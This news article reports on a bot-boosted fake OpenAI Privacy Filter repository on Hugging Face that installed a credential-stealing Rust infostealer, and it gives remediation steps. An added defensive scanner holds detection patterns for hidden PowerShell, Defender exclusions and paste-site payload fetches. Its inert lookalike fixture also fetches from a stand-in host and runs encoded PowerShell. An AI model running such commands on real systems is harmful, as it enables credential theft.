Fake OpenAI Repo Hit #1 on Hugging Face—And Stole Passwords While It Trended


In brief

  • A malicious Hugging Face repository impersonating OpenAI's Privacy Filter model reached #1 trending on the platform.
  • The malware registered about 244,000 downloads and 667 likes in under 18 hours before being removed.
  • The repository delivered a six-stage infostealer that harvested browser passwords, Discord tokens, crypto wallet keys, and SSH credentials from Windows machines—then silently sent everything to attacker-controlled servers.

OpenAI released Privacy Filter in late April—a small, open-weight model built to detect and automatically redact personally identifiable information from text. It landed on Hugging Face under an Apache 2.0 licence and quickly attracted developer interest. Someone noticed.

Within days, a fake account named "Open-OSS" published a near-identical repository called privacy-filter. The model card was copied word for word from OpenAI's. The only difference in the readme file: instructions to clone the repo and run a file called start.bat on Windows, or loader.py on Linux and Mac.

Within 18 hours, the fake repo hit #1 on Hugging Face's trending page—racking up about 244,000 downloads and 667 likes. HiddenLayer, the AI security firm that flagged the campaign, found that 657 of those 667 likes came from accounts matching predictable auto-generated bot-naming patterns.

The download numbers were almost certainly inflated the same way: manufactured social proof to make the bait look real.

How the malware actually worked

The malware essentially worked like a poisoned pill wrapped in a very convincing candy coating. The loader.py script opens with fake model training output—progress bars, synthetic datasets, dummy class names—designed to look like a real AI loader is running.

Under the hood, it quietly disables security checks, pulls an encoded command from a public JSON paste site (a clever trick: no need to update the repository once the payload changes), and passes that command to PowerShell running entirely hidden in the background. Windows users see nothing.

That command downloads a second script from a domain mimicking a blockchain analytics API. That script downloads the real malware—a custom-built infostealer written in Rust—adds it to Windows Defender's exclusions list, then launches it at SYSTEM-level privileges via a scheduled task that immediately deletes itself after firing. The entire chain runs and cleans up after itself, leaving almost no trace.
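As an added example (not code from the article, from HiddenLayer, or from Hugging Face), the following Python script does the pre-run triage a developer could apply to a freshly cloned model repository: it flags launcher files a weights-and-config repo has no reason to ship, a model card that tells you to run them, and script lines showing the traits described above (hidden PowerShell, encoded commands, a payload fetched from a public paste site, Defender exclusions, SYSTEM scheduled tasks). The rule set, weights, the six-point threshold and the two constructed sample repositories are assumptions of this example; the lookalike fixture uses placeholders rather than any real URL or payload and executes nothing.

```python
"""Static triage of a cloned model repository before anything in it is run.

Added example, not HiddenLayer's or Hugging Face's tooling. Rule names,
weights, threshold and the sample repos are this example's own assumptions.
"""
import re
import tempfile
from dataclasses import dataclass, field
from pathlib import Path

# A weights-plus-config repo is loaded by a library; it needs no launcher of its own.
LAUNCHER_NAMES = {"start.bat", "loader.py", "install.bat", "setup.bat", "run.ps1"}
TEXT_SUFFIXES = {".py", ".bat", ".cmd", ".ps1", ".vbs", ".sh", ".md", ".txt", ".json"}

# (rule name, regex, weight): each rule maps to a behaviour the article describes.
RULES = [
    ("hidden_powershell", r'powershell(?:\.exe)?\b[^\n]*-w(?:indowstyle)?[\s",]+hidden', 4),
    ("encoded_command", r'-(?:e|enc|encodedcommand)\b[\s",]+\S{16,}', 4),
    ("defender_exclusion", r'Add-MpPreference\b[^\n]*-ExclusionPath', 5),
    ("system_scheduled_task", r'''schtasks\b[^\n]*/ru[\s"']+system|New-ScheduledTaskPrincipal\b[^\n]*system''', 4),
    ("task_self_delete", r'schtasks\b[^\n]*/delete|Unregister-ScheduledTask', 3),
    ("paste_site_fetch", r'''https?://(?:[^\s'"/]*\.)?(?:pastebin|paste|jsonbin|rentry|hastebin|ghostbin)\.[a-z]+''', 3),
    ("base64_decode", r'base64\.b64decode|FromBase64String|certutil\b[^\n]*-decode', 2),
    ("tls_verify_disabled", r'verify\s*=\s*False|_create_unverified_context|SkipCertificateCheck', 2),
    ("readme_run_instruction", r'(?:run|execute|double[- ]click|launch)\s+[\w./\\-]+\.(?:bat|py|ps1|cmd)\b', 3),
]
COMPILED = [(n, re.compile(p, re.IGNORECASE), w) for n, p, w in RULES]


@dataclass
class Finding:
    path: str
    line_no: int
    rule: str
    weight: int
    excerpt: str


@dataclass
class Report:
    launchers: list[str] = field(default_factory=list)
    findings: list[Finding] = field(default_factory=list)

    @property
    def score(self) -> int:
        # Each launcher file counts on its own; every matched rule adds its weight.
        return 3 * len(self.launchers) + sum(f.weight for f in self.findings)

    @property
    def verdict(self) -> str:
        return "suspicious" if self.score >= 6 else "no_red_flags"


def scan_repo(root: Path) -> Report:
    """Walk a checkout, record launcher files and every rule hit per text line."""
    report = Report()
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        if path.suffix.lower() not in TEXT_SUFFIXES:
            continue
        rel = path.relative_to(root).as_posix()
        if path.name.lower() in LAUNCHER_NAMES:
            report.launchers.append(rel)
        text = path.read_text(encoding="utf-8", errors="replace")
        for line_no, line in enumerate(text.splitlines(), 1):
            for name, rx, weight in COMPILED:
                if rx.search(line):
                    report.findings.append(Finding(rel, line_no, name, weight, line.strip()[:80]))
    return report


# Constructed fixtures. The lookalike loader is an inert stand-in for the
# article's loader.py (fake training output, encoded command from a paste
# site, hidden PowerShell); placeholders replace any real URL or payload.
GOOD_README = "# privacy-filter\n\nLoad it with the transformers pipeline API:\n\n    from transformers import pipeline\n"
BAD_README = GOOD_README + "\nTo get started, run start.bat on Windows or loader.py on Linux/macOS.\n"
BAD_LOADER = (
    "import subprocess, urllib.request, base64\n"
    'print("Loading privacy-filter... epoch 1/3 [####------] loss=0.41")\n'
    'raw = urllib.request.urlopen("https://paste.example/raw/PLACEHOLDER").read()\n'
    "cmd = base64.b64decode(raw)\n"
    'subprocess.run(["powershell", "-WindowStyle", "Hidden", "-EncodedCommand", "PLACEHOLDER_ENCODED_PAYLOAD"])\n'
)
BAD_BAT = "@echo off\r\npowershell -w hidden -enc PLACEHOLDER_BASE64_STRING\r\n"


def build_sample_repos(base: Path) -> tuple[Path, Path]:
    """Write a clean repo and a lookalike repo under base; return both paths."""
    good, bad = base / "clean-privacy-filter", base / "lookalike-privacy-filter"
    for repo in (good, bad):
        repo.mkdir(parents=True, exist_ok=True)
        (repo / "config.json").write_text('{"model_type": "bert"}\n')
    (good / "README.md").write_text(GOOD_README)
    (bad / "README.md").write_text(BAD_README)
    (bad / "loader.py").write_text(BAD_LOADER)
    (bad / "start.bat").write_text(BAD_BAT)
    return good, bad


def run_demo() -> dict[str, Report]:
    """Scan both constructed repos in a temporary directory."""
    with tempfile.TemporaryDirectory() as tmp:
        good, bad = build_sample_repos(Path(tmp))
        return {"good": scan_repo(good), "bad": scan_repo(bad)}


if __name__ == "__main__":
    for label, rep in run_demo().items():
        print(f"{label}: verdict={rep.verdict} score={rep.score} launchers={rep.launchers}")
        for f in rep.findings:
            print(f"  {f.path}:{f.line_no} [{f.rule}] {f.excerpt}")
```

Run it directly to scan the two constructed repos, or call scan_repo(Path("path/to/clone")) on a real checkout before running anything from it. A high score is a reason to read the scripts and the model card, not proof of malware: a repo that legitimately ships a Python helper still trips the launcher rule, which is why the verdict rests on the weighted sum rather than on any single hit.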

The final payload is thorough. It grabs everything stored in Chrome and Firefox—saved passwords, session cookies, browser history, encryption keys, everything. It targets Discord accounts, cryptocurrency wallet seed phrases, SSH keys, FTP credentials, and takes screenshots across all monitors. Then it packages everything as a compressed JSON bundle and ships it to attacker-controlled servers.

There's no need for us to tell you what the hackers can do with all that information later.

The malware also checks whether it's running in a virtual machine or a security sandbox, and quits quietly if it detects one. It's designed to run once on real targets, steal everything, and disappear.

Why this is bigger than just one repo

This isn't an isolated incident. It's part of a pattern. HiddenLayer identified six additional repositories under a separate Hugging Face account named "anthfu," uploaded in late April, using the exact same malicious loader pointing to the exact same command server. Those repos impersonated models like Qwen3, DeepSeek, and Bonsai to lure AI developers.

The infrastructure itself—a domain called api.eth-fastscan.org—was also observed hosting a separate malware sample that beacons to a command server. HiddenLayer describes the two campaigns as "possibly linked" and cautions that shared infrastructure alone doesn't confirm a single operator.

This is what a supply chain attack against the AI developer community looks like. The attacker doesn't break into OpenAI or Hugging Face. They just post a convincing lookalike, game the trending algorithm with bots, and wait for developers to do the rest. A similar playbook hit the Lottie Player JavaScript library in 2024, costing one user 10 Bitcoin (worth over $700,000 at the time).

What if you downloaded it?

If you cloned Open-OSS/privacy-filter on a Windows machine and ran any file from it, you should treat the machine as fully compromised. Don't log into anything from that machine before wiping it.

After that, change all the credentials that were stored in your browser—passwords, session cookies, OAuth tokens. Move any crypto funds to a new wallet generated on a clean machine ASAP and assume seed phrases were stolen.

Since it also gets your Discord data, and that service is heavily automated, you should invalidate your Discord sessions and reset that password. Any SSH keys or FTP credentials on that machine should be considered burned.

The repository is now removed. Hugging Face has not disclosed what, if any, further screening measures it plans to implement for trending repositories.

As of now, 7 confirmed malicious repositories from this campaign have been identified. How many more exist—or existed before being detected—remains unknown.
